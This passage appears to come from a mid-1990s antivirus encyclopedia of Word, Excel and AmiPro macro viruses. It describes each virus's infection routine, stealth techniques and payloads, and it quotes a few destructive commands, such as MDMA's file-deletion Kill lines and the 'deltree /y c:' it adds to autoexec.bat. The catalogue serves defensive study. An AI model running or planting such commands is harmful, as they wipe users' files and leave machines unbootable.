activated with the "AutoExec" and "AutoOpen" macro. Before it infects the global template (normal.dot), it checks for a previous infection. It does not infect if it finds the "AutoExec" macro. Documents become infected when they are saved with the "FileSaveAs" command. After the virus macros have been transfered to the global template, Nuclear calls some destructive payloads. The first payload tries to drop the "Ph33r" virus. Between 17:00 and 17:59, Nuclear creates a text file including a script of the DOS/Windows-EXE virus "Ph33r". It then uses the DOS command "DEBUG.EXE" to convert the file into an executable file. It also creates the "EXEC_PH.BAT" batch file, and calls it via a Dos shell. This last infection routine is faulty, the DOS-window is closed immediately, and the "Ph33r" virus never infects the system. The second payload, upon printing a document, Nuclear checks the system time and in case of a value bigger than 55 in the seconds field, it adds the following text to the end of the printed document: " And finally I would like to say: " " STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " The third destructive payload is activated on April 5th, when Nuclear deletes the system files "C:\IO.SYS", "C:\MSDOS.SYS" and "C:\COMMAND.COM. This leaves the computer unbootable. [WORD_NOP] Virus name: WORD_Nop:De Number of macros: 2 Encrypted: No Macro names: AutoOpen, NOP (DateiSpeichern) Size of macros: 246 Bytes Place of origin: Germany Date of origin: Summer, 1996 Destructive: No Common In-The-Wild: Yes Description: WORD_NOP is a very primitive virus and has only very few necessary commands in order to replicate. The only special characteristic of the NOP virus is that it turns off the prompting of Word before saving the global template (NORMAL.DOT). When an infected document is opened, NOP transfers itself to the global template and renames "NOP" into "DateiSpeichern". Additional documents become infected when they are saved. [WORD_NF] Virus Name: WORD_NF Alias Name: Names, NF:De Virus Type: Word macro virus Virus Length: 4209 Bytes (6 Macros) Symptoms: Display of Windows Place of origin: United States Description: This virus infects MS Word documents. NF contains 2 encrypted macros (Execute-Only) with a size of 286 Bytes. "AutoClose" "NF" When an infected document is opened, NF will infect the global template (NORMAL.DOT). Further documents are infected when they are closed. Infected documents are converted internally to templates which is very common for macro viruses. Upon infection, NF will display the following message at the bottom of the screen: "Traced!" NF is one of the very few non-destructive macro viruses. [WORD_MDMA] Virus Name: WORD_MDMA Alias Name: StickyKeys, MDMA-DMV Virus Type: Word macro virus Virus Length: 1635 Bytes (1 Macro) Symptoms: Files are deleted Place of origin: United States Description: This virus infects MS Word documents. MDMA is the first macro virus that will work on Windows, Windows 95, Macintosh and Windows NT. It can be a very destructive macro virus, and Word users are strongly advised to check their system with an up-to-date anti-virus program. MDMA contains only one macro with a size of 1635 Bytes. "AutoClose" When an infected document is opened and then closed, MDMA infects the global template (NORMAL.DOT). Further documents are infected when they are closed ("AutoClose"). Infected documents are also converted to templates which is very common for macro viruses. If an infected document is loaded on the first of each month, MDMA activates its destructive payloads. The following payloads will be executed depending on the operating system: Windows: -------- Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat This will delete all the directories on the C:\ drive. Windows NT: ----------- Kill "*.*"; Kill "c:\shmk." This will delete all the files on the C:\ drive Macintosh: ---------- Kill MacID$("****") This will delete all files on the hard drive. Windows 95: ----------- Kill "c" \shmk."; Kill "c:\windows\*.hlp"; Kill "c:\windows\system\*.cpl" SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\Stickykeys", "On", "1", "") SetPrivateProfileString ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","") SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\HighContrst", "On", "1", "") MDMA will also display the following window: " You are infected with MDMA_DMV. Brought to you by MDMA (Many Delinquent " " Modern Anarchists)." To combat destructive macro viruses, such as MDMA, we advise users to use an up-to-date anti-virus program. Microsoft has also released a new Microsoft Word version, which will warn each time a suspicious macro is loaded. Users can then decide if they want to disable the macro. The Microsoft Word upgrade is available for a small fee from Microsoft. [WORD_Maddog] Virus Name: WORD_Maddog Virus Type: Word macro virus Virus Length: 4209 Bytes (6 Macros) Symptoms: Documents contain the text string "MadDog" Place of origin: Georgia, United States Description: This virus infects MS Word documents. Maddog contains 6 macros with a size of 4209 Bytes. "AutoOpen" "AutoClose" "AutoExec" "FileClose" "FcFinish" "AopnFinish" When an infected document is opened, MadDog will infect the global template (NORMAL.DOT). Further documents are infected when they are close with the "FileClose" command. Upon closing a document, MadDog saves various times to "Temp1" and then saves the active document. Infected documents are converted internally into templates, which is very common for macro viruses. Infected documents contain the text string "MadDog". [WORD_Tele] Virus name: WORD_Tele (a.k.a LBYNJ, Telefonica, Tele-Sex) Number of macros: 7 Encrypted: Yes Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken, DateiNeu, DateiOeffnen, Telefonica Size of macros: 22256 Bytes Place of origin: Germany Date of origin: April, 1996 Destructive: Yes Common In-The-Wild: No Description: Tele's "AutoExec" macro includes the infection routine for the global template (normal.dot), which will not get infected when inside the WIN.INI file (entry "Compatibility"), the string "0x0030303" is set to "LBYNJ". Tele uses the "Telefonica" macro to check for a previous infection. It will not infect the global template if the macro is already present. Documents are infected upon "DateiBeenden" ("FileClose"), "DateiNeu" ("FileNew") and "DateiOeffnen" ("FileOpen"), whereby at the end of "DateiOeffnen" ("FileOpen") the macro "Telefonica" is called again. Infected documents are changed to templates, which is very common for macro viruses. Tele has two destructive payloads. The first one can be found in the "DateiDrucken" (FilePrint) macro. Upon printing a documtent, Tele checks the system time and in case of a value less than 10 in the seconds field, it will add the following text to the end of the printed document: " Lucifer by Nightmare Joker (1996) " The second payload is activated from the "Telefonica" macro when the second field has a value of 0 or 1. ("Telefonica" is called from "AutoOpen", "AutoExec" and "DateiOeffnen"). Is this the case, Tele creates a Debug script, (filename: TELEFONI.SCR), inside the "C:\DOS" directory which includes the DOS based virus "Kampana.3784". After creating the script file, LBYNJ executes the "TELEFONI.BAT" batch file which uses the DOS command "DEBUG.EXE" to convert the script file into an executable DOS-based virus and then starts it. [WORD_Irish] Virus Name: WORD_Irish Virus Type: Word macro virus Virus Length: 4152 Bytes (4 Macros) Symptoms: Display of windows Place of origin: USA Description: This virus infects MS Word documents. Irish contains 4 macros with a size of 4152 Bytes. "AutoOpen" "WordHelp" "AntiVirus" "WordHelpNT" Upon opening an infected document, Irish will infect the global template (NORMAL.DOT). An infected global template contains the "FileSave" macro, instead of "AutoOpen". Further documents are infected when the "FileSave" command is used. Infected documents are converted internally to templates which is very common for macro viruses. Two of the macros, "WordHelp" and "WordHelpNT", do not run automatically. However, when executed manually by the user, they will change the Windows desktop color to green. The macro "WordHelpNT" contains a payload which attempts to activate the screen saver and display the following message: "Happy Saint Patties Day " However, the payload seems to be faulty and does not work under Windows 95 (Irish only exists in Microsoft Word). [WORD_DMV] Virus name: WORD_DMV (a.k.a. Demonstration) Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 3002 Bytes Place of origin: USA Date of origin: Fall, 1994 Destructive: No Common In-The-Wild: No Description: DMV was the first macro virus written by Joel McNamara, who published a detailed paper about macro viruses. It is believed that DMV invited additional virus authors to write Word macro viruses. While the paper was not published until Concept was discovered, it helped virus authors to use new techniques. Joel McNamara also published an Excel macro virus, which is non functional (EXCEL_DMV.A) DMV infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are alse closed. Upon infection, DMV displays the following messages: " Counting global macros " " AutoClose macro virus is already installed in NORMAL.DOT. " " Infected NORMAL.DOT with a copy of AutoClose macro virus. " " AutoClose macro virus already present in this document. " " Saved current document as template. " " Infected current document with copy of AutoClose macro virus. " " Macro virus has been spread. Now execute some other code " " (good, bad, or indifferent). " [WORD_Hot] Virus name: WORD_Hot Number of macros: 4 Encrypted: Yes Macro names: AutoOpen, DrawBringInFrOut, InsertPBreak, ToolsRepaginat, FileSaveAs, StartOfDoc Size of macros: 5515 Bytes Place of origin: Unknown Date of origin: January, 1996 Destructive: Yes Common In-The-Wild: Yes Description: When an infected document is opened the virus is activated by the AutoOpen macro. Some replicated Hot samples also display the following error message: " Unable to load the specified library " Hot turns off the prompting of Word to ensure a hidden infection of the global template (normal.dot). It also checks the file "WINWORD6.INI" for the following entry: "QLHot". If not present, Hot records a "hot date", 14 days in the future. Is this variable is not already set, the global template becomes infected. The InsertPBreak/InsertPageBreak insert a page-break into the current document. However, it is also used by the virus to recognise if a document is already infected. Some of the macros are renamed when they are copied by the WordBasic "MacroCopy" command: "AutoOpen" becomes "StartOfDoc" "DrawBringInFrOut" becomes "AutoOpen" "InsertPBreak" becomes "InsertPageBreak" "ToolsRepaginat" becomes "FileSave" In addition the global template contains the following macros: "FileSave" (similar to "ToolsRepaginat") "StartOfDoc" (similar to "AutoOpen") Hot also uses special functions from the Windows file "KERNEL.EXE" (Win API). It uses the API to find the path for Windows and to open files which are only very simple functions. It should be noted that many other options were available to the virus author. The destructive payload, which is reached upon arrival of the hot date" set under the "QLHot" section in the WINWORD6.ini file, deletes text from the current active document. This payload is bypassed if the file EGA5.CPI is present in the "C:\DOS" directory. A comment in the virus source code suggests that this is a "feature" designed to protect the virus author and his friends. [WORD_Hassle] Virus Name: WORD_Hassle Alias Name: Bogus Virus Type: Word macro virus Virus Length: 8283 Bytes (7 Macros) Symptoms: Display of windows Place of origin: USA Description: This virus infects MS Word documents. Hassle contains 7 encrypted (Execute-Only) macros with a size of 8283 Bytes. "AutoClose" "ToolsMacro" "Microsoft01" "Microsoft02" "Microsoft03" "Microsoft04" "Microsoft05" When an infected document is opened, Hassle will infect the global template (NORMAL.DOT). Hassle uses macro stealth techniques to hide itself. It uses the macro "ToolsMacro" to make recognition of an infected document more difficult. If the user selects any command, it will display the following windows and close Microsoft Word: " Out of Memory or System Resources" Hassle is one of the very few non-destructive macro viruses. It only infects other files and displays the following text window: "Are you sure to Quit?" This only occurs seldomly, with a 5% probability. Another payload asks the user to register a software with Microsoft. Hassle will only accept one answer, which is as follows: "Bill Gates", "Microsoft" and "666" Whenever the user selects the Tools/Macro command, Hassle will display the following text at the bottom of the screen: " Microsoft Word Assistant Version 6.2" [WORD_HiSexy] Virus Name: WORD_HiSexy Alias Name: Teaside, Guess, Phantom Virus Type: Word macro virus Platform: Word 6/7 Number of Macros: 1 Encrypted: No Size of Macros: 1126 Bytes Place of Origin: Germany Date of Origin: May, 1996 Destructive: Yes Trigger Date: None Password: None Seen In The Wild: No Description: When an infected document is opened, HiSexy checks if the document variables are set to "populated". If this is not the case, a new global template (normal.dot) is created and the virus macro "AutoOpen" is copied into the new document. After that, the variable is set to "populated" in order to mark the file as infected. If the variable is already set, the virus infects the new document by transfering the "AutoOpen" macro using the MakroCopy command. HiSexy is the first macro virus to use the document variables as a checking mechanism for already infected documents. Because of an error inside the virus code, the virus does not replicate properly. Upon a random number (between 0 and 100), HiSexy activates various destructive payloads. It changes the active font size or creates a new document with the following text: " The word is out. " " The word is spreading... " " The Phantom speaks... " " Sedbergh " " is CRAP " " The word spreads... " The text will then be printed out. The following texts will be inserted into the active document upon a calculated random number: " This school is really good. NOT " " We all love Mr. Hirst. " " M.R.Beard " " This network is REALLY fast. " " Hi Sexy! " " Who's been typing on my computer? " " Well helloooo there! " " Guess who? " [WORD_Goldfish] Virus Name: WORD_Goldfish Alias Name: Fishfood Virus Type: Word macro virus Virus Length: 1906 Bytes (2 Macros) Symptoms: Display of windows Place of origin: USA Description: This virus infects MS Word documents. Goldfish contains 2 encrypted (Execute-Only) macros with a size of 1906 Bytes. "AutoOpen" "AutoClose" When an infected document is opened, Goldfish will infect the global template (NORMAL.DOT). Further documents are infected when they are opened ("AutoOpen"). Infected documents are converted internally into templates, which is very common for macro viruses. Goldfish is one of the very few non-destructive macro viruses. It only infects other files and displays the following text window: "I am the goldfish, I am hungry, feed me." The message will not go away until the user types in an acceptable response. The available answers are: "fishfood", "worms", "worm", "pryme" and "core". [WORD_Friendly] Virus name: WORD_Friendly:De Number of macros: 20 Encrypted: No Macro names: Abbrechen, AutoExec, AutoOpen, Cancel, DateiBeenden, DateiNeu, DateiOeffnen, DateiSchliessen, DateiSpeichern, DateiSpeichernUnter, ExtrasMacro, ExtrasMakro, Fast, FileExit, FileNew, FileOpen, FileSave, FileSaveAs, Infizieren, Talk Size of macros: 9867 Bytes Place of origin: Germany Date of origin: May, 1996 Destructive: Yes Common In-The-Wild: No Description: Friendly was an effort to write a virus for more than one language, yet due to some wrong translations (ExtrasMacro instead of ToolsMacro) Friendly does not work with other versions than the German version of Microsoft Word. Friendly tries to infect the global template (normal.dot) when an infected document is opened. It checks the global template for a previous infection by looking for the text "Friendly", Author = Nightmare". After the macros have been transfered the destructive payload is called from the "Fast" macro. Friendly infects other documents whenever new ones are created, an action is canceled, and whenever documents are opened, closed, saved, or Exited from Word. Friendly does not check for a previous document infection. It simply overwrites existing macros. The destructive payload, inside the "Fast" macro, is called when the system clock has a second value smaller than 2. Friendly then creates a debug script inside the C:\DOS directory and executes the the DOS DEBUG.EXE command. In addition, Friendly adds an entry into AUTOEXEC.BAT, so the DOS based virus is started after the next boot-up. The DOS based virus inside Friendly has a size of 395 Bytes and is a memory resident companion virus encrypted with CryptCOM. Friendly displays the following message on January 1st: " Ein gutes neues Jahr ! " and infects EXE files upon execution. COM files are created with the same name and with the attributes "READ-ONLY" and "HIDDEN". If the virus is active, the following text is displayed when people try to look at the macro list: "You can't do that!" "I'm very anxious!" "Hello my friend!" "<< Friends >> Virus" (translated:) "Du kannst das nicht tun!" "Ich bin sehr aengstlich!" "Hallo mein Freund!" "<< Friends >> Virus" After May 1st Friendly displays the following text when infecting documents for the first time (except for NORMAL.DOT). "Hallo mein Freund!" "Ich bin der << Friends >> Virus und wie heißt du?" "Gib doch bitte anschließend unten deinen Namen ein:" "Also ..... ich habe eine gute und eine schlechte Nachricht fuer dich!" "Die schlechte Nachricht ist, daß ich mich auf deiner Platte eingenistet" "habe und die gute ist, daß ich aber ein freundlicher und auch nuetzlicher "Virus bin. Druecke bitte OK fuer Weiter!" "Wenn du mich nicht killst, dann fuege ich ein Programm in deine" "Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt." "Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!" (translated:) "Hello my Friend!" "I'm the << Friends >> Virus and how are you?" "Can you give me your name, please?" "Hello .... I have a good and a bad message for you! The bad message is that" "you have now a Virus on your Harddisk and the good message is that I'm "harmless and useful. Press OK!" "If you don't kill me, I will insert a programme in your AutoExec.bat thats "your Keyboard accelerated. Please .... don't kill me. Goodbye!" The entered name will then also be displayed. [WORD_FMT.Trojan] Virus name: WORD_FMT.Trojan (a.k.a. TrojanFormat) Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 81 Bytes Place of origin: Posted to Usenet Date of origin: Unknown Destructive: Yes Common In-The-Wild: No Description: FormatC is not a virus but a trojan horse, which does not replicate. When an infected document is opened, the trojan triggers the destructive payload, which types " Format C: /U " in a minimized DOS box and then formats the C drive. FormatC is very unlikely to spread since it does not infect other files. [WORD_Doggie] Virus Name: WORD_Doggie Alias Name: None Virus Type: Word macro virus Virus Length: 610 Bytes (3 Macros) Symptoms: Display of windows Place of origin: USA Description: This virus infects MS Word documents. Doggie contains 3 macros with a size of 610 Bytes. "Doggie" "AutoOpen" "FileSaveAs" Upon opening an infected document, Doggie will infect the global template (NORMAL.DOT). Further documents are infected with the "FileSaveAs" command. Infected documents are converted internally to templates, which is very common for macro viruses. Doggie is one of the very few non-destructive macro viruses. It only infects other files and displays the following text window: "Doggie " Since Doggie uses English macro names ("FileSaveAs") it will only work with the English version of Microsoft Word. [WORD_WW2DEMO] Virus Name: WORD_WW2Demo Alias Name: WM.DMV Virus Type: Word macro virus Virus Length: 3002 Bytes (1 Macro) Symptoms: Display of messages Place of origin: United States, also posted in Usenet Description: This virus infects MS Word documents. Demonstration contains 1 macro with a size of 3002 Bytes. "AutoClose" Demonstration was the first macro virus written by Joel McNamara, who published a detailed paper about macro viruses. It is believed that DMV invited additional virus authors to write Word macro viruses. While the paper was not published until Concept was discovered, it helped virus authors to use new techniques. Joel McNamara also published an Excel macro virus, which is non functional. When an infected document is closed, DMV infects the global template (NORMAL.DOT). Further documents are infected when they are closed. They are also converted internally to templates, which is very common for macro viruses. Upon infection, Demonstration displays the following text strings on the screen: " Counting global macros" "AutoClose macro virus is already installed in NORMAL.DOT." "Infected NORMAL.DOT with a copy of AutoClose macro virus. " "AutoClose macro virus already present in this document." "Saved current document as template." "Infected current document with copy of AutoClose macro virus." " Macro virus has been spread. Now execute some other code (good, bad, or indifferent)." [WORD_Divina] Virus Name: WORD_Divina Alias Name: Roberta Virus Type: Word macro virus Virus Length: 2357 Bytes (1 Macro) Symptoms: Beeps and pauses during display of messages, Display of text windows Place of origin: Italy Description: This virus infects MS Word documents. Divina was probably written by the author of the Date macro virus, and is widespread in Malta, Spain and Italy. Divina contains only one encrypted (Execute-Only) macro with a size of 2357 Bytes. "AutoClose" Divina infects the global template (NORMAL.DOT) when an infected document is opened and then closed. Further documents are infected when they are closed via the "AutoClose" command. Divina has two payloads. The first payload checks the system time, and in case of a value of 17 in the minutes field, it will display a set of windows. Between each displayed box it will pause and beep. The following boxes are displayed: "ROBERTA TI AMO!" "Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus?" "Exit from system and low level format are recommended." "Exit from System?" After the last message Divina tries to exit Windows. The second payload is activated on May 21. Divina will again check the system clock, and if a document is being closed between the 10th and 20th or between the 40th and 50th minute, it will display another 2 windows. "DIVINA IS THE BEST!" followed by another window with an Italian message. Divina does not contain any destructive payloads. The only problem with Divina is that it might panic users into low-level formatting their hard drives. [WORD_Date] Virus Name: WORD_Date Alias Name: AntiDMV, Infezione Virus Type: Word macro virus Virus Length: 1042 Bytes (1 Macro) Symptoms: Removal of AutoClose macro from documents Place of origin: United States Description: This virus infects MS Word documents. Date was probably written by the author of the Divina macro virus. It contains only one encrypted (Execute-Only) macro, with a size of 1042 Bytes. "AutoOpen" When an infected document is opened, Date infects the global template (NORMAL.DOT). Further documents are infected when they are opened. Infection occurs only until June 1, 1996. By the time you read this document, Date should not be a threat anymore even though infected documents might still be around. Date is also known under the name AntiDMV. This name was chosen because it removes the "AutoClose" macro from documents. The macro virus "DMV", which has only one "AutoClose" macro, can therefore be removed with the Date virus. [WORD_CONCEPT-G] Virus Name: Word_Concept.G Alias Name: Parasite, Parasite 0.8, P-Site Virus Type: Word macro virus Virus Length: 3670 Bytes (7 Macros) in .doc files 3450 Bytes (7 Macros) in global templates Symptoms: Display of Windows Modified documents Place of origin: United States Description: This virus infects MS Word documents. Concept.G contains 7 encrypted (Execute-Only) macros with a size of 3670 Bytes. "K" "A678" "Para" "Site" "I8U9Y13" "Paylaod" "AutoOpen" Concept.G is activated when an infected document is opened (AutoOpen). Upon activation, Concept.G infects the global template (NORMAL.DOT). Infected documents are converted internally to templates, which is very common for macro viruses. Concept.G has various payloads. The first replaces the following words in infected documents: "and" with "not" The second payload is a little bit more comprehensive. Concept.G checks the system time for a specific value in the days section. In case of a 16 (every 16th of the month) it activates its payloads. It then replaces the following letters/word in infected documents: "." (dot) with "," (comma) "and" with "not" "a" with an "e" According to the Concept.G virus code, it is a beta release. Instead of version 1.0 (Concept.F) it is version 0.8. [WORD_Concept] Virus name: WORD_Concept (a.k.a Prank, WW6Macro, Winword, WBMV) Number of macros: 4 Encrypted: No Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload Size of macros: 1968 Bytes Place of origin: USA Date of origin: July, 1995 Destructive: No Common In-The-Wild: Yes Description: Concept was the first macro virus found "In-the-Wild". It was discovered in July-August 1995 and is now the most common virus. Concept activates when an infected document is opened (AutoOpen). Upon activation, Concept checks for a previous infection of the global template (normal.dot). If none of the macros are present, Concept copies its virus macros. The "AAAZFS" macro is saved under the name "FileSaveAs". After infecting the global template, Concept makes an entry in the Win.ini file. It sets "WW6I=1" and displays a window with a "1" in it. Concept does not contain any destructive payload, even though is has a macro with the name "Payload". The "Payload" macro is empty except for the following text: " That's enough to prove my point " [WORD_Colors] Virus name: WORD_Colors (a.k.a Rainbow) Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, macros, ToolsMacro Size of macros: 6470 Bytes Place of origin: Portugal Date of origin: Posted to Usenet on October, 1995 Payload: Yes Common In-The-Wild: Yes Description: Colors is the first macro virus that can still infect, even when all the Auto-macros are turned off. It also uses "ToolsMacro" to make recognition of an infected file more difficult (called macro stealth technique). Upon activation of one of its macros (all except for AutoExec), Colors tries to infect the global template (normal.dot). It checks if all its macros are already present in the global template and if this is not the case, it transfers the virus macros or replaces already existing ones. The global template becomes infected when a document is opened, saved, closed or Microsoft Word is exited. Further documents become infected when a file is created (FileNew) or saved (FileSave, FileSaveAs). The destructive payload is located in the "macros" macro. Once activated Colors creates a variable in the [Windows] section of Win.ini with the name "countersu", which counts upwards from zero. After each 300th call, Colors changes the color palette of 21 Windows desktop elements. Background, buttons and borders will have new randomly selected colors, which will leave the user with a sometimes unusual looking desktop. [WINWORD_COLORS.D] Virus Name: WinWORD_Colors.D Alias Name: Colo-d, WM.Colors Virus Type: Word macro virus Virus Length: 19688 Bytes (9 Macros) Symptoms: Display of error messages Place of origin: Unknown Description: This virus infects MS Word documents. Colors.D is a macro virus including 9 encrypted (Execute-Only) macros: "AutoClose" "AutoExec" "AutoOpen" "FileExit" "FileNew" "FileSave" "FileSaveAs" "macros" "ToolsMacros" Colors.D seems to be a combination of the previously found Colors.A virus and the Microsoft macro virus solution "Scanprot." It is not recommended to use the Tools/Macro command to look for the macros from Colors.B. The virus will execute when trying to do so. Instead, use the File/Templates/Organizer/Macros command to detect and delete the offending macros. Even though Colors.D has an anti-virus solution part in its code, it is still able to spread and infect the global template (NORMAL.DOT) and new documents. Colors.D displays the following error message: "Unknown Command, Subroutine, or Function" [WORD_CLOCK] Virus Name: Word_Clock Alias Name: Clock:De, WM.Extra Virus Type: Word macro virus Virus Length: 3795 Bytes (11 Macros) Symptoms: Display of windows Place of origin: USA Description: This virus infects MS Word documents. Clock contains eleven encrypted (Execute-Only) macros with a size of 3795 Bytes. "Action" "Oeffnen" "AutoExec" "AutoOpen" "Speichern" "Extrasmakro" "DateiSchliessen" "Datumunduhrzeit" "Dateidokvorlagen" "Dateiallesspeichern" Clock uses macro stealth techniques to hide itself. It uses "ExtrasMakro" ("ToolsMacro") and "DateiDokVorlagen" ("File Templates") to make recognition of an infected document more difficult. When an infected document is opened, Clock infects the global template (NORMAL.DOT). To hide the infection it turns off the prompting of Word before saving a modified global template. Infected documents are converted internally into templates, which is very common for macro viruses. When an infected document is opened after the 26th of each month, Clock will display a window containing the time. It will also activate one of its destructive payloads, which is to set the system clock to a value of 33 in the seconds field. Clock does this every 2 to 3 minutes, which results in a less accurate system clock. The second payload will start in 1997. Clock will check the system clock, and in case of a minute value smaller than 5, it will flip the "FileOpen" and "FileSave" macros. This will only happen on the following days during the month: 1st 2nd 13th 21st 27th. Since Clock uses German macro names, it will only work with the German version of Microsoft Word. [WORD_BueroNeu] Virus Name: Word_BueroNeu Alias Name: Buero:De, BuroNeu, Bureau Virus Type: Word macro virus Virus Length: 697 Bytes (2 Macros) Symptoms: Files deleted Files renamed Place of origin: Germany Description: This virus infects MS Word documents. Buero contains two encrypted (Execute-Only) macros with a size of 697 Bytes. "AutoOpen" "BueroNeu" When an infected document is opened, Buero infects the global template (NORMAL.DOT). The global template includes the "DateiSpeichern" macro instead of "AutOpen." Further documents are infected with the "DateiSpeichern" ("FileSave") command. Infected documents are converted internally into templates, which is very common for macro viruses. Upon infection Buero activates its destructive payloads. After August 15, 1996, Buero renames the system file "IO.SYS" to "IIO.SYS." This action will leave the computer unbootable. The second destructive payload searches for C:\*.DOC files and deletes them. Since Buero uses German macro names ("DateiSpeichern"), it will only work with the German version of Microsoft Word. [WORD_Boom] Virus name: WORD_Boom:De (a.k.a. Boombastic) Number of macros: 4 Encrypted: Yes Macro names: AutoExec, AutoOpen, DateiSpeichernUnter, System Size of macros: 2863 Bytes Place of origin: Germany Date of origin: July, 1996 Payload: Yes Common In-The-Wild: Yes Description: Boom is the second macro virus written for the German version of Microsoft WORD_ Boom's destructive payload renames the menu structure of Word to: Datei -> Mr.Boombastic Bearbeiten -> and Ansicht -> Sir WIXALOT Einfuegen -> are Format -> watching Extras -> you Tabelle -> ! Fenster -> ! Hilfe -> ! A sound is send to the PC speaker during the renaming process. After the menu change, Boom will create a new global template and insert the following text: " Greetings from Mr. Boombastic and Sir WIXALOT !!! " " Oskar L., wir kriegen dich!!! " "Dies ist eine Initiative des Institutes zur Vermeidung und Verbreitung von " " Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen, unter der " " Schirmherrschaft von Rudi S. ! " This text will be printed by Boom. [WORD_Bandung] Virus Name: WORD_Bandung Alias Name: None Virus Type: Word macro virus Virus Length: 4262 Bytes (6 Macros) Symptoms: Display of windows Creation of new files Place of origin: Bandung, Indonesia Description: This virus infects MS Word documents. Bandung contains 6 macros with a size of 4262 Bytes. "AutoExec" "AutoOpen" "FileSave" "FileSaveAs" "Toolsmacro" "Toolscustomize" When an infected document is opened, Bandung infects the global template (NORMAL.DOT). Further documents are infected with the "FileSave" and "FileSaveAs" commands. Infected documents are converted internally into templates, which is very common for macro viruses. Bandung also uses macro stealth techniques to hide itself. It uses "ToolsMacro" to make recognition of an infected document more difficult. Upon infection Bandung activates its destructive payloads. It creates the file C:\PESAN.TXT with following message: "Anda rupanya sedang sial, semua file di mesin ini kecuali yang berada " "di direktori WINDOWS dan WINWORD telah hilang, jangan kaget, ini bukan " "ulah Anda, tapi ini hasil pekerjaan saya...Barang siapa yang berhasil " " menemukan cara menangkal virus ini, saya aka" + "n memberi listing" "virus ini untuk Anda !!! Dan tentu saja saya akan terus datang kesini" " untuk memberi Anda salam dengan virus-virus terbaru dari saya...selamat ! " " Bandung, Selasa," Following the message is the current Day, Month, Year, Date and Time. Example: 29 Agustus 1996, Jam: 18:09 Bandung also displays the following error messages: " Fail on step 29296 " and "No such macro or command" [WORD_Atom] Virus name: WORD_Atom (a.k.a. Atomic) Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1029 Bytes Place of origin: Ukraine Date of origin: February, 1996 Destructive: Yes Common In-The-Wild: Yes Description: Atom infects the global template (Normal.dot) once an infected document is opened. Further documents become infected when a document is opened (FileOpen) or saved (FileSaveAs). When the "FileSaveAs" macro is called, Atom checks the system clock for a value of 13 in the seconds field. If this is the case, Atom adds the password "ATOM#1" to the saved document. The destructive payload inside the "Atom" is activated on the 13th of each month. On this day, Atom deletes all the files inside the current directory. [EXCEL_Laroux.A] Virus name: EXCEL_Laroux.A Virus Type: Macro virus Number of modules: 1 Module Name: laroux Sub-Routines: Auto_Open, Check_Files Place of origin: USA Date of origin: 1996 Payload: No Seen In-The-Wild: Yes Description: Laroux is the first macro virus written for Microsoft Excel. When an infected file is opened (Auto_Open), the "Check_ files" macro is called (from the Auto_Open macro) and PERSONAL.XLS (similar to Word's NORMAL.DOT) becomes infected. Further files become infected when they are activated (OnSheetActivate). The following sections of the "File Properties" section are cleared by Laroux: Title Subject Author Keywords Comments Laroux is not destructive and its macro (laroux) is not hidden from the user. It can be located with Word's Tools/Macro option. [EXCEL_Robocop] Virus name: EXCEL_Robocop Virus Type: Macro virus Number of modules: 2 Module Name: ROBO, COP Sub-Routines: Auto_Open Place of origin: Germany Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Robocop is another Excel macro virus that was published over the Internet. When an infected file is opened (Auto_Open called by ROBO), the PERSONAL.XLS becomes infected. Further files become infected when they are activated (SheetActivate). On March 1st of each year, Robocop inserts the following text into the active sheet: " ROBOCOP Nightmare Joker [SLAM] " [EXCEL_Sofa (a.k.a. MicroSofa)] Virus name: EXCEL_Sofa (a.k.a. MicroSofa) Virus Type: Macro virus Number of modules: 1 Module Name: (11 spaces) Sub-Routines: Auto_Open, Auto_Range, Auto_Close, Current_Open Place of origin: USA Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: Sofa was the second working Excel macro virus (after Laroux). When an infected file is opened, the "Microsoft Excel" title is changed to "Microsofa Excel" and the infection routine is called upon. First, Sofa looks for the BOOK.XLT file and if it can not find the file, the system is not yet infected, it will display the following message: " Microsoft Excel has detected a corrupted add-in file " " Click OK to repair this file " Sofa then creates the infected file and displays: " File successfully repaired! " Upon starting Excel the next time, the infected BOOK.XLT file is loaded into the system and all further files will become infected. [EXCEL_Legend] Virus name: EXCEL_Legend Virus Type: Macro virus Number of modules: 1 Module Name: Legend Sub-Routines: Auto_Open, Infect Place of origin: USA Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: Legend is another Excel macro virus that was published over the Internet. When an infected file is opened, "Auto_Open" sets the sub-routine "Infect" as a SheetActivate handler. As a result all activated sheets will call the "Infect" sub-routine and PERSONAL.XLS or the active sheet will become infected. To make recognition of an infection more difficult, Legend removes the Tools/Macro option (called macro stealth technique). Legend will not infect any files if the user name is " Pyro " and the name of the organization is: " VBB ". The following message is displayed by Legend: " Pyro [VBB] " " You've Been Infected By Legend! " [Lotus.Green_Stripe] Virus name: Lotus.Green_Stripe Virus Type: Word macro virus Size: 6256 Bytes Place of origin: USA Date of origin: 1996 Payload: Yes Seen In-The-Wild: No Description: Green_Stripe is the first demonstration virus written for Lotus AmiPro. While macro viruses for Microsoft Word spread very quick, Green_Stripe is very unlikely to get in the wild. AmiPro keeps its macro file separate from the document and therefore it will not spread very far. To ensure infection of both files, the document and the macro have to be transmitted. This is very unlikely to happen when a user sends an infected file via e-mail. When an infected file is opened, the macro (*.smm) is activated. At this point Green_Stripe goes through the document directory and tries to open and infect each file (.sam). The user will experience files being opened and closed very quickly which should alert the user. Green_Stripe creates an error message when it tries to open an already opened file. New infected macro files are saved with the extension .smm and are hidden. Further documents become infected when they are saved with the "Save" or "SaveAs" option. Another alert for the user should be the "SaveAs" box, which looks different compared to the original one. The new 